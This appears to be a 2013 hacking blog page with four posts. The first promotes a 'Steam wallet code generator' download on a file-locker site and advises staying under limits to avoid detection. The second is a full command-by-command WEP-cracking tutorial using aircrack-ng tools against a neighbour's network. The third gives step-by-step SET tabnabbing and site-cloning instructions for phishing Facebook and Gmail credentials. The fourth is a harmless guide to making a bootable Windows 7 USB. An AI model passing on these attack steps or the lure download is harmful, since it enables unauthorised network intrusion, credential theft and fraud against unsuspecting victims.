Ez money Ez life my friend

Tuesday 16 July 2013

Steam Wallet Hack – Free Steam Wallet Codes


Steam Wallet Hack – Free Steam Wallet Codes


Since Steam is one of the most popular platforms where you can buy games and other gaming items, and many members suggesting to write a guide for steam wallet hack we decided to make this post. This is quite new tool and it was not introduced before as it was available for only few people. Here you will find out how to get free steam wallet codes using this hack with step by step instructions. But before that , lets talk more about what exactly this tool does.

What is Steam Hack and its features ?

Before, when couple of similar programs were made, usually they were based on changing the Steam wallet balance by injecting. This was not a good way to be honest because often the balance was removed and all the games that were bought are deleted as well. The best way is to try to get steam codes free ,that you can redeem just like when you buy these codes online. This way all credits that you get will stay forever and you do not have to worry about it being removed. Lets see where you can download it and you can read more about it later in the post.
Steam Wallet Hack
Main window
Here you can see the main window of the tool with step by step instructions. It makes using it really easy
Steam Wallet Hack 2013 Download
           

Instructions for running the hack and getting Free Steam Codes

  1. Download Steam wallet code generator from download button above
  2. Run it and connect via Main or Alternative server
  3. You can then get your access key – Its needed for fast decryption servers
  4. Paste and and Validate
  5. Generate your codes – Choose between 10, 30 and 50$ codes
  6. Paste the code into last field and you will get the code that is ready to be redeemed
  7. Redeem and Enjoy!
Note that as you are doing steps they are turning green , telling you that you finished that step.
More information about Steam wallet and the hack tool
Steam Wallet Code Generator
Automatic Update Feature for Steam wallet code generator
One of the best features that were added in version 3 is the automatic updates. This means that free steam codes are updated automatically and whenever you run the program. As these codes are dynamically being added and decrypted , that means that you can get one code and when you restart the program after few minutes the databases should refresh with new codes. This is great because before version 3.0 users had to download new version of the hack every day which contained new codes.
Free Steam Codes
When you generate the code it is still encrypted and it needs to run on new decrypting servers. New , faster servers are added in new version which much faster , and you can basically get you code within minutes. And that is why you need access key if you were wondering. In previous versions you had to wait for slower servers , which took a day or two.
How to Redeem the code ?
Redeeming the free Steam wallet codes that you get is rather easy. You can go to official Steam website and type the code just like when you buy it on official website or one of the stores. Its best not to go with more then 100$-150$ per day , as this is looking natural. Steam wallet hack now has detection status , and if it says undetected you are safe to use every code that you get with it. This means that the codes are safe and not blacklisted. If for some reason it turns red , you should wait for new version.


Download link:http://fileice.net/download.php?file=3zaln

Friday 24 May 2013

TOTAL GUIDE TO WEP HACKING [WIFI] [TUT]



The Stuff that you are going to need is 
(1) Backtrack (You can get it here)
(2) Wireless Card that Supports Packet Injection


Before we Start, I take it for Granted that you are aware of a Few things...

I Hope You already have a Live CD, Bootable USB or a Virtual Backtrack Installed in your System. In case of Virtual Machine, You will need an External Wireless Card. And in case you don't already have Backtrack, I suggest you bookmark this page and get it first.

Also, I hope you have googled by now to see if your Wireless Card will support Packet Injection or not. Again, if you haven't already done that go and get this done first :)

Now that we are Ready.. Lets Begin..

If You are Using a Boot CD, As in my case, You will see the folllowing screen when the CD Loads.


  1. [Image: backtrackstartup.png]

Just Select "Start BackTrack FrameBuffer (1024x768)" 
or Select "Start BackTrack FrameBuffer (800x600)"
Depending On your Display Settings. These Options are to get to the GUI of Backtrack.

What will follow next is the Loading of all Drivers and Other Processes. Once they come to a halt. You will See a Cursor. Just Type in "startx".

Once, the Startup is Completed you will be at the Desktop of Backtrack

Now, We better get our Network Interfaces Started. While there are a few ways of Doing that. The simplest way is through the Menu.
[Image: backtrackstartnetwork.png]

Once, Network has been Started. We need to go Start a Konsole. Which we will be using to enter all commands to crack wep.

Once, inside the Konsole. Type in "iwconfig" to see the status of all the network interfaces of your Machine.

In My Case, My Wireless Interface is "wlan0". In your case, It can be any other or might just be wlan0. Remember, whatever your interface, replace my "wlan0" with it throughout the Tutorial now.

Now that we know the Interface, we better put it on monitoring mode. To do that, we need to type this command.
airmon-ng start wlan0

Press ENTER and You will see that monitor mode for your Wireless Interface will be enabled now. In my case, the monitor mode has been enabled at "mon0". This will be our new Interface now not "wlan0".
[Image: airmon1.png]

Now that the monitor mode has been enabled. We will scan our Area for any WEP Encrypted Wifi Networks. To do that we need to type the following command.
airodump-ng --encrypt wep mon0

What you will see Next will be A List of All the WEP Encrypted WIFI Networks around you. There are some details in there too. Here's a simple explanation of a few of them
BSSID = MAC Address of the slave (Most Important)
PWR = Signal Strength
CH = Channel Number
ENC = Encryption Type
ESSID= Name of slave's Network
#Data = Amount of IVS Collected (Most Important)
#/s = IVS Per Second

You Might just wanna copy the BSSID as it is going to be used a lot.

Our slave's Details
BSSID= 00:50:F1:12:12:10
CH = 1
ESSID= {censored}


[Image: airodump1.png]

Something, You might wanna know but is not useful for WEP is that the "STATION" are the Computers currently connected to the Network. As you can notice, My slave currently has a Computer connected to it.While STATION is important for WPA Hacking, It is not useful for WEP Hacking.

Now that we have our slave in Sight. It is now time to target our Interface on collecting packets from it. So, now we will make our airodump-ng more specific to target it on our slave's Network.
airodump-ng --bssid 00:50:F1:12:12:10 --channel 1 --encrypt wep --ivs --write wephack mon0

Once You hit ENTER. You will notice that now our Wireless Interface will only focus on Our slave's Network (In this case: 00:50:F1:12:12:10)

[Image: airodump3.png]

Now that we have targeted the slave's Network. It is time to Start gathering Packets from it. There are two ways for Doing it.
(1) Fragment Attack
(2) Arpreplay

Its your Lucky day..lol.. I will be going through both. 

But before these attacks, we need to fool the Router into thinking that we are authenticated to receive data from it. To do this we will "fakeauth" the slave's Router.
aireplay-ng --fakeauth 0 -a 00:50:F1:12:12:10 mon0

Once, You hit ENTER you will see something Like this when the Attack is Successful. 

02:29:07 Sending Authentication Request (Open System) [ACK]
02:29:07 Authentication successful
02:29:07 Sending Association Request [ACK]
02:29:07 Association Successful :-) (AID: 1)

Now that the Association is Successful. We will initiate the Process to collect Arps. First, We will try Arpreplay as it is a very simple attack. Here's the command.
aireplay-ng --arpreplay -b 00:50:F1:12:12:10 mon0

Once, You hit ENTER you will see something Like this. After a Few Seconds or Maybe a few minutes, You may see the number of arps rise. If that happens ARPREPLAY has been successful or else, We will have to move on to Fragment Attack.

[Image: aireplay3.png]

OK. Since, Our Arpreplay has failed we will now initiate a Fragment attack. Here's the code
aireplay-ng --fragment -b 00:50:F1:12:12:10 mon0

Once, You hit ENTER. Out Network Interface will start to collect Packets from The slave's Router. When it asks you to use a particular packet. Just hit Y and press ENTER.

It will now try to capture 1500 bytes of Keystream. This keystream will be stored in a XOR file as in my case- fragment -0123-023217.xor We will later use this very captured keystream to forge it into a packet using packetforge-ng.

[Image: aireplay6.png]

Basically, what we are going to do is use that keystream and make a valid packet out of it. Then we will use that packet to arpreplay our slave's Router. So, Lets make a packet then..
packetforge-ng --arp -a 00:50:F1:12:12:10 -h 11:22:33:44:55:66 -l 255.255.255.255 -k 255.255.255.255 -y fragment-0123-023217.xor -w wepfrag
OK. To keep this command simple let me just say this. Here, "-a" is the slave's MAC Address and "-h" is our MAC Address which I just entered for namesake. Let the rest of the things be the same. For those extra Information Seekers.. You can pm me or just google it. 

Just hit ENTER and there we go, the Packet has been made.

[Image: aireplay8.png]

Now, We will use this packet to arp attack the slave's Router. Here's the Command.
aireplay-ng --arpreplay -r wepfrag -b 00:50:F1:12:12:10 mon0

Just hit ENTER and the Mag!c Finally begins...

Now, Its Time to Play Wait & Watch... Just Wait till the #Data Table reaches 30000 or close...

[Image: aireplay12.png]

Once, You have enough #Data Packets. It is time to Initiate the Final Kill. aircrack. Here's the command.
aircrack-ng wephack-01.ivs

Hit a Final ENTER and See the Process.. Will take a few Seconds or Minutes.. depending on the Password....

And Voila... Here it is....

[Image: aireplay15.png]


===================================================================
This article was published on http://gamersnhacks.blogspot.in/
and i take no credit for writing it.
===================================================================

HACKING FACEBOOK ,GMAIL ACCOUNT USING BACKTRACK AND SET




Hello, friends i am back with a latest post on hacking facebook,gmail accounts using backtrack and social engineering kit.Things you needed are following:---> 1. Backtrack 5 R2 2. Internet connection 3. A brain Now follow all my steps like i am showing in this post:----->

1. First open the social engineering kit using this command in cd /pentest/exploits/set and then press enter and then type ./set and hit enter like in image.


2. Now type 1 to select Social-Engineering Attacks and hit enter as in image.

3. Now type 2 to select Website Attack Vectors and hit enter as in image.

4. Now type 4 to select Tabnabbing Attack Method and hit enter.

5. Now type 2 to select Site Cloner and hit enter.

6. Now enter the site address whom which you want to create fake pages.

7. Now ti will start cloning the site. 8. Now send ur ip address as a link to victim.

9. Now when victim click on it he/she get the fake page and when he fill the details he will got hacked. Note : its for educational purpose.

Tuesday 30 April 2013

Create Bootable USB Pen Drive for Windows 7


Installing Windows from a USB flash drive has several advantages : First of all, the overall speed of the installation process will increase significantly, carrying a USB stick is much more convenient than a DVD, and finally it becomes possible to install the OS even on those systems that do not have a DVD drive, such as a netbook.


In this post, I will show you how to load the Windows installation in your USB flash drive and how to make it bootable just like the DVD from your .iso image.

There are Two Options: 

1. Windows 7 USB-DVD Download Tool.
2. Basic Option.

1. Windows 7 USB-DVD Download Tool:
Just Download this Tool from Microsoft Website and Install in your Desired PC then browse your .iso image and follow some easy steps:-


2. Basic Option:
Tools Required:

1. USB flash drive with a minimum capacity of 4 GB.
2. Windows 7 Setup DVD.


Step 1 : Plug-in your USB flash drive.

Step 2 : Open the PowerShell (OR Command Prompt if PowerShell Not Exist). If you are using Windows 7/Vista then open it with administrator rights*.

"Goto Start -> All Programs -> Accessories ->Windows PowerShell ->  Right-click on “Windows PowerShell” and select “Run as Administrator”.

Step 3: In the PowerShell, type

DISKPART

This will start the Microsoft DiskPart utility as shown below:

Now issue the following command:
LIST DISK

This will show you a list of  available disks on your system. Disk 0 is usually the hard disk. In my case,Disk 1 is the USB drive (this can be a different one in your case). Now issue the command as shown below:



 SELECT DISK 1



above command, 1 is the USB drive number on my system. If you have a different number on your system, then you need to replace 1 with that number.

Step-4: Now issue the following list of commands one by one as shown below:

CLEAN
CREATE PARTITION PRIMARY
SELECT PARTITION 1
ACTIVE
FORMAT FS=NTFS QUICK
ASSIGN
EXIT





Close Power Shell and proceed to the next step.

Step 5: Insert the Windows 7/Vista installation disc and note down the “drive letter” of your DVD drive. In my case, it is “H:”.



Open the Command prompt. If you are using Windows 7/Vista then open it with administrator rights.

Goto Start -> All Programs -> Accessories -> Right-click on “Command Prompt” and select “Run as Administrator”.

Now type the following list of commands as shown below:
H:
CD BOOT
BOOTSECT.EXE /NT60 G:(NOTE:
G: is your USB drive letter)

EXIT



Step-6: Copy the contents of your Windows 7/Vista installation disk into the USB flash drive.
Directly Copy-Paste All DVD file into Usb Stick Then…

Your USB stick is now ready to boot and install the OS for you. Don’t forget to enable the “USB Boot” option and change the “Boot priority to USB device from hard disk” in your BIOS settings.

Note: Remember that you'll need to make boot order change in the BIOS. See How To Change the Boot Order in BIOS if you need help doing that.






Thanks & Blessing be on you all!